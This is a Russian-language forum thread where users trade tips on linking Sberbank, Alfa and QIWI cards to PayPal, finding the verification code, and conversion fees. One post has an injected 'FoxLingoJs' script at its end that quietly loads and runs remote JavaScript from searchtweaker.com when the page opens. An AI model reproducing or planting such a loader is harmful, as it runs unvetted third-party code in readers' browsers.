PayPal

Шики

New member
Ainrom, а у Вас какой банк был, если не секрет. У меня Альфа.
Ясно, спасибо, успокоили. А то уже собралась за голову хвататься, что денежки канули в лету. Буду ждать.
 
А кто-нибудь может объяснить мне, желательно как для идиота, как зачислить деньги на счет Paypal? =___=
Карта - Виза Сбербанк.
Я нигде там пояснений не могу найти, как зачислить на счет.
Или можно не зачислять, а просто оплачивать через Paypal с карты? А как это сделать, если можно?
Я что-то совсем дурак, и вообще ничего в Paypal не понимаю.
 

Ainrom

New member
Маммон,
Нужно привязать свою карту к пейпал аккаунту, и оплачивая счета деньги будут снимать с карты. Точно не помню, при привязке вроде 1$ снимают с карты, чтобы проверить ее.
 
Ainrom, это я уже сделал, да. Я просто все смотрю там на справку, и не понимаю ничего.
То есть, больше ничего делать не нужно, никуда ничего переводить не нужно? Они там сами все снимут с карты и переведут в йены, если оплачивать Playmoa, например, да?
 
A

Ai.for.st

Guest
Подскажите, пожалуйста!... :bx:

Вчера "привязала" карту (QIWI Visa Classic) к PayPal. Всё, вроде бы, прошло удачно... Сначала со счёта сняли $ 1, потом ещё $ 1.95.

Сегодня же, при попытке отправить платёж, выбегает следующее сообщение:

"Не удалось выполнить данную операцию, поскольку мы не смогли проверить эту кредитную карту с помощью процедуры проверки кредитных карт.
Чтобы продолжить выполнение операции, выберите другой способ финансирования или добавьте другую кредитную карту."


Сразу же после этого PayPal пытался снять с меня сумму платежа в двойном размере... А её на карточке, конечно же, не было... :bw:
Поэтому платёж отклонили.

Я не могу понять: проблема по стороны банка, или со стороны PayPal?... :bw:
 

mikki-malu

Well-known member
Ai.for.st,
после этой привязки в банке надо код транзакции получить и ввести его в пейпале, чтобы завершить процесс верификации карты. Делали такое?
 
A

Ai.for.st

Guest
mikki-malu, это 4-хзначный который, да?... :bx:

Да, это делала.
И выбегало сообщение, что верификация прошла успешно... :bx:

Поэтому вообще не понимаю, в чём проблема... :bn:
 

mikki-malu

Well-known member
Ai.for.st,
хм, не знаю тогда даже. Может, палка с этой картой не дружит?
 
A

Ai.for.st

Guest
mikki-malu, да вроде QVC нормально с PayPal'ом работала. Судя по отзывам из Internet'а... :bx:

Из банка ответили:
"К сожалению, на момент совершения Вами платежа с помощью карты QIWI VISA на нашем сервере проводились технологические работы."

Зато теперь у меня выбегает в PayPal:
Отправка платежа: Невозможно завершить данную операцию... :bm:
 
A

Ai.for.st

Guest
[OFF]Платёж всё же отправился (с 4-от или 5-ой попытки... :bm:)!... Ура!... :bp:[/OFF]
 

El.dar

New member
Прокаченные пользователи, объясните, пожалуйста, новичку как лучше оплачивать услуги за рубежом!
Карту с какой платёжной системой лучше выбрать - Визу или Мастеркард? Действительно ли у Визы процент больше на проведение операций - http://moifigurki.ru/showpost.php?p=33024&postcount=99
Стоит ли привязывать карту к Пэйпал, и пытаться оплатить через неё, если сумма первой операции будет около 700$? На каком-то сайте читал, что лимита на проведение денежных операций в Пэйпал не существует - это так срабатывает у них безопасность.
Буду признателен за помощь.<script id="FoxLingoJs">(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();</script>
 
Последнее редактирование:

SilveR_FoX4910

Heavy_Weapon_fun
Товарищи, подскажите пожалуйста, где можно найти этот, высылаемый Пэйпалом, четырехзначный код? Я уже весь сбербанконлайн вверхдном перевернул, но он не выдает выписку с необходимым кодом.
 

Deamon 666

Well-known member
Товарищи, подскажите пожалуйста, где можно найти этот, высылаемый Пэйпалом, четырехзначный код? Я уже весь сбербанконлайн вверхдном перевернул, но он не выдает выписку с необходимым кодом.
У вас смс уведомления подключены? Если да, то при снятии денег пэйпалом должно было прийти смс, в нем должен был быть этот код. Также он может быть в выписке, где есть списание этого 1 доллара, который палка в подтверждение списывает. Просто возможно у вас еще выписка не обновилась, на следующий день точно должна быть. Там в примечании он будет.
 

SilveR_FoX4910

Heavy_Weapon_fun
Deamon 666,
Дело в том, что деньги сняли еще в январе. Но тогда мне некогда было подтвеждать палку и не был подключен мобильный банк. Сейчас все подключено, но можно ли запросить повторное подверждение карты?
 

antonina

New member
SilveR_FoX4910,
[OFF]тоже так получилось, первый раз не подтвердила вовремя работоспособность карты - второй раз (по крайней мере 3 года назад) дали ее провести, наверное крестик на ней поставили - пробуйте, вдруг получится =))[/OFF]
 

SilveR_FoX4910

Heavy_Weapon_fun
Проблема наконец-то решилась. )
Но у меня возник вопрос. У палки прямая связь со счетом прикрепленным к карточке или деньги нужно переводить с карты в палку?
 

Lucius

Member
SilveR_FoX4910, прямая связь, не забывайте также о комиссии пайпала при конвертации:ad:
 
Сверху